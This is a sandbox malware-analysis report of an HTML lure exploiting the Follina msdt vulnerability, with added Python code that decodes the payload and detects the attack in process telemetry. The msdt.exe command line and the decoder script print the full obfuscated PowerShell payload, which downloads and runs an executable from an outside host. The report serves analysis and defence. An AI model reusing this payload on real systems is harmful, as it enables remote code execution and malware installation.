Windows Analysis Report: 1024203777.test.html
Overview
General Information
Detection
Score: | 56 (range 0 - 100) |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 2040, cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank", MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- chrome.exe (PID: 5872, cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8, MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- msdt.exe (PID: 5908, cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22, MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
- chrome.exe (PID: 6352, cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html", MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup

The msdt.exe command line is the Follina (CVE-2022-30190) invocation in one argument: an ms-msdt: URI for the PCWDiagnostic troubleshooter whose IT_BrowseForFile parameter embeds a PowerShell $( ) subexpression. The subexpression hides the characters `::` and `"` behind [chAr] concatenation, Base64-encodes the real script, and is followed by a path-traversal suffix; msdt.exe was launched from the HTML file opened in Chrome, not from an Office document.
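The following Python is an added editorial example, not part of the Joe Sandbox report, that peels the three obfuscation layers of the msdt.exe argument above and pulls the indicators out of the resulting PowerShell: URL decoding, evaluation of the 'literal'+[char]N concatenation, and Base64. MSDT_ARG is the report's own command-line argument with the spaces that the rendering inserted every ten characters removed; the function names, the tokenizer and the IOC regular expressions are the example's own and are tuned to this sample's shape (single-quoted literals joined by `+`), so a variant that uses double-quoted strings or `-join` would need a different tokenizer.

```python
import base64
import re
from urllib.parse import unquote

# The ms-msdt: argument of the msdt.exe command line in this report, with the
# spaces that the report rendering inserted every ten characters removed.
# This is the sample's own data, reproduced here for decoding.
MSDT_ARG = (
    "ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3"
    "%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'"
    "+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A"
    "+'FRomBasE64sTrIng('+[cHAR]34+'"
    "c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAn"
    "W0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMg"
    "ZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50"
    "IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRU"
    "b0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6"
    "QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGws"
    "Um91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUg"
    "J3NkaWFnbmhvc3Qn"
    "'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22"
)

# Tokens of a PowerShell concatenation: 'literal' or [char]N (decimal or 0x hex).
TOKEN_RE = re.compile(r"'((?:[^']|'')*)'|\[ch?ar\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
B64_RE = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)
URL_RE = re.compile(r"https?://[\w./?=&%-]+", re.IGNORECASE)
ENV_PATH_RE = re.compile(r"\$env:[a-z_]+\\[\w.\\-]+", re.IGNORECASE)


def balanced_span(text, open_idx):
    """Index one past the ')' matching the '(' at open_idx. Single-quoted
    literals are skipped so parentheses inside strings do not count."""
    depth, in_str = 0, False
    for i in range(open_idx, len(text)):
        c = text[i]
        if in_str:
            in_str = c != "'"
        elif c == "'":
            in_str = True
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return i + 1
    raise ValueError("unbalanced parentheses")


def resolve_concat(expr):
    """Evaluate 'lit'+[char]58+'lit'... to the string PowerShell would build."""
    parts = []
    for m in TOKEN_RE.finditer(expr):
        if m.group(1) is not None:
            parts.append(m.group(1).replace("''", "'"))
        else:
            parts.append(chr(int(m.group(2), 0)))
    return "".join(parts)


def deobfuscate_msdt(uri):
    """Peel the three layers and pull IOCs out of the final PowerShell."""
    params = unquote(uri)                              # layer 1: %20 / %22
    start = params.index("$(")
    subexpr = params[start:balanced_span(params, start + 1)]
    inner = subexpr.lower().rindex("iex(")             # innermost Invoke-Expression
    arg = subexpr[inner + 4:balanced_span(subexpr, inner + 3) - 1]
    stage2 = resolve_concat(arg)                       # layer 2: [char] concatenation
    m = B64_RE.search(stage2)
    if m is None:
        raise ValueError("no FromBase64String(...) call in stage 2")
    stage3 = base64.b64decode(m.group(1)).decode("utf-8")   # layer 3: Base64
    return {
        "msdt_params": params,
        "stage2": stage2,
        "stage3": stage3,
        "urls": URL_RE.findall(stage3),
        "drop_paths": sorted({p.lower() for p in ENV_PATH_RE.findall(stage3)}),
    }


if __name__ == "__main__":
    result = deobfuscate_msdt(MSDT_ARG)
    print(result["stage3"])
    print("download:", result["urls"], "dropped as:", result["drop_paths"])
```

Stage 2 is `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` in mixed case, which the inner Invoke-Expression runs to produce stage 3, and the outer Invoke-Expression then executes. Stage 3 stops the msdt process, uses Add-Type to declare a P/Invoke for urlmon's URLDownloadToFile, downloads the next stage from the URL in the decoded script to $env:APPDATA\AnyName.exe, sleeps three seconds, launches it through rundll32 zipfldr.dll,RouteTheCall, and finally stops sdiagnhost. The TCP and DNS tables later in this report contain only Google endpoints, so no connection to that download host was recorded during this run.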
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
 | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
 | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
Signature section. The per-signature details and behaviour links of the original report are not preserved in this rendering; only the categories and the number of hits survive, in report order:

AV Detection |
---|
- Virustotal: sample detected (permalink not preserved)

Exploits |
---|
- File source: 3 hits (the JoeSecurity_Follina Yara matches listed above)

Remaining signatures |
---|
- Directory created: 1
- IP address: 1
- DNS traffic detected: 1
- Network traffic detected: 10
- HTTP traffic detected: 2
- Virustotal: 1
- File created: 1
- Key opened: 1
- Classification label: 1
- Process created: 38
- File created: 1
- Automated click: 17
- File opened: 1
- Window detected: 1
- Directory created: 1
- Window / User API: 1
- Process created: 2
MITRE ATT&CK matrix. A leading number marks a technique that this sample's signatures mapped to, with the count of matching signatures; cells without a number are the empty matrix template and were not observed.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Application Window Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 4 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
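The Execution entry above (Command and Scripting Interpreter) corresponds to the msdt.exe launch in the process tree, and that launch is what a detection should key on. The following Python is an added editorial example, not part of the Joe Sandbox report, that encodes the indicators visible in that command line as a check over process-creation events of the kind Sysmon event 1 or an EDR would emit. The sample events are constructed: the first reproduces the report's msdt.exe command line with the PowerShell payload shortened to '...', the others are benign launches added for contrast. The field names, the list of unexpected parents and the decision rule are the example's own choices.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote


@dataclass(frozen=True)
class ProcessCreate:
    """Minimal process-creation event (the fields a Sysmon EID 1 row carries)."""
    parent_image: str
    image: str
    cmdline: str


# Indicators lifted from the msdt.exe command line in this report.
MSDT_SCHEME = re.compile(r"\bms-msdt:", re.IGNORECASE)
# A PowerShell subexpression "$(" inside an IT_BrowseForFile value is the
# injection itself; a legitimate troubleshooter launch never carries one.
BROWSE_SUBEXPR = re.compile(r"IT_BrowseForFile=[^\s\"]*?\$\(", re.IGNORECASE)
# A run of "../" segments: the exploit walks out of the diagnostics folder.
TRAVERSAL = re.compile(r"(?:\.\./){3,}")
# Parents that have no business launching the troubleshooter wizard.
UNEXPECTED_PARENTS = {
    "chrome.exe", "msedge.exe", "firefox.exe",
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def follina_indicators(ev):
    """Indicators present on an msdt.exe launch; empty for other images."""
    if basename(ev.image) != "msdt.exe":
        return []
    # The protocol handler hands msdt the URI still percent-encoded, so
    # decode first; the same patterns then match either logged form.
    cmd = unquote(ev.cmdline)
    found = []
    if MSDT_SCHEME.search(cmd):
        found.append("ms-msdt: protocol handler")
    if BROWSE_SUBEXPR.search(cmd):
        found.append("IT_BrowseForFile contains a $( ) subexpression")
    if TRAVERSAL.search(cmd):
        found.append("path traversal in parameter")
    parent = basename(ev.parent_image)
    if parent in UNEXPECTED_PARENTS:
        found.append("launched by " + parent)
    return found


def is_follina(ev):
    """Alert on the subexpression alone; the other indicators raise confidence
    but the ms-msdt: scheme by itself is also used by legitimate launches."""
    return any(i.startswith("IT_BrowseForFile") for i in follina_indicators(ev))


# Constructed sample telemetry (not taken from a real log).
SAMPLE_EVENTS = [
    ProcessCreate(  # the report's launch, payload shortened to '...'
        parent_image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        image=r"C:\Windows\System32\msdt.exe",
        cmdline=(r'"C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22'
                 r"It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX('...'))"
                 r"Y/../../../../../../../../../../../.EXE%20%22"),
    ),
    ProcessCreate(  # Program Compatibility Troubleshooter opened from Control Panel
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\msdt.exe",
        cmdline=r'"C:\Windows\System32\msdt.exe" -id PCWDiagnostic',
    ),
    ProcessCreate(  # protocol-handler launch without any injected expression
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\msdt.exe",
        cmdline=r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic',
    ),
    ProcessCreate(  # unrelated browser start
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        cmdline=r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"',
    ),
]


def scan(events):
    """(image, indicators) for every event the rule fires on."""
    return [(basename(ev.image), follina_indicators(ev)) for ev in events if is_follina(ev)]


if __name__ == "__main__":
    for image, why in scan(SAMPLE_EVENTS):
        print(image, "->", "; ".join(why))
```

Only the first event fires, with all four indicators; the third event shows why the ms-msdt: scheme on its own must not be the trigger, since the same URI form is used when a user opens a troubleshooter. The parent check is deliberately a confidence booster rather than a requirement: in this report the parent is chrome.exe because the lure is an HTML file, whereas the Office variants of this exploit show winword.exe.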
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 5% | ReversingLabs | | |
 | 10% | Virustotal | | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.215.237 | true | false | high | |
www.google.com | 172.217.168.36 | true | false | high | |
clients.l.google.com | 172.217.168.78 | true | false | high | |
clients2.google.com | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
 | false | | high |
 | false | | high |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false | |
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.1 |
127.0.0.1 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 696527 |
Start date and time: | 2022-09-02 13:43:41 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 36s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 1024203777.test.html |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Without Instrumentation |
Number of new started processes analysed: | 21 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.winHTML@38/0@6/6 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 142.250.203.106, 172.217.168.67
- Excluded domains from analysis (whitelisted): eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r3---sn-4g5edn6k.gvt1.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, r3---sn-4g5edndz.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtWriteVirtualMemory calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
239.255.255.250 | 19 associated samples (names, hashes and links not preserved in this rendering) | | malicious | | |

Note that 239.255.255.250 is the SSDP multicast address that every Windows host sends discovery traffic to, so sharing it with other malicious samples carries no attribution or IOC value.
File type: | |
Entropy (8bit): | 6.048046902595105 |
TrID: | |
File name: | 1024203777.test.html |
File size: | 19364 |
MD5: | c389f7ee1d9e6376b7d96e80d7a1ffe1 |
SHA1: | 2d0b931cf7cecddddb35457a5719353840f8ca66 |
SHA256: | 8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da |
SHA512: | 7de15cf2ed560a6ff7e7fd5d3c8b0e4f13ca585bab09d40e89785fc12f5b4c79d9f4cec4034b3f40f4ca54abab100e27947867558dbc7876366a8b614eea0ffc |
SSDEEP: | 384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW |
TLSH: | C092C0E9EECC15EB09D1E230F66438DC05A60D4B117A21914CAF3EAD8FCD7535C1A6B1 |
File Content Preview: | <!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo |
Icon Hash: | 78d0a8cccc88c460 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 13:44:45.298142910 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.298190117 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.298266888 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.298594952 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.298614979 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.302855968 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.302901983 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.303025961 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.303272009 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.303383112 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.356822014 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.357728004 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.357767105 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.359915972 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.360013008 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.365551949 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.397695065 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.397739887 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.398715973 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.398741007 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.398847103 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.399993896 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.400103092 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.480348110 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.480611086 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:46.480916977 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.480954885 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:46.481775045 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.481990099 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.482475042 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.482487917 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.537067890 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:46.537244081 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.537256002 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:46.537322044 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.551109076 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.551202059 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.551211119 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.551255941 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.557853937 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.557879925 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.558527946 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.558537006 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:47.856543064 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.856575012 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.856664896 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.868709087 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.868736982 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.927571058 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.935904980 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.935935020 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.937294006 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.937356949 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.941312075 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.941577911 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:48.147372961 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:48.147465944 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:57.922693968 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:57.922867060 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:57.922975063 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:59.333468914 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:59.333524942 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.840552092 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.840643883 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.840753078 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.841257095 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.841281891 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.891971111 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.947191000 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.947251081 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.947819948 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.948422909 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.948534012 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:49.058383942 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:58.924508095 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:58.924648046 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:58.925008059 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:44.084222078 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:44.084563971 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.020622969 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.020781040 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.021688938 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.022022963 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.022471905 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.023252964 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.023299932 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.080158949 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.080512047 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.080538034 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.080985069 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.081543922 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.081640959 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.233598948 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:58.100610018 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:58.100716114 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:58.100817919 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:47:43.113172054 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
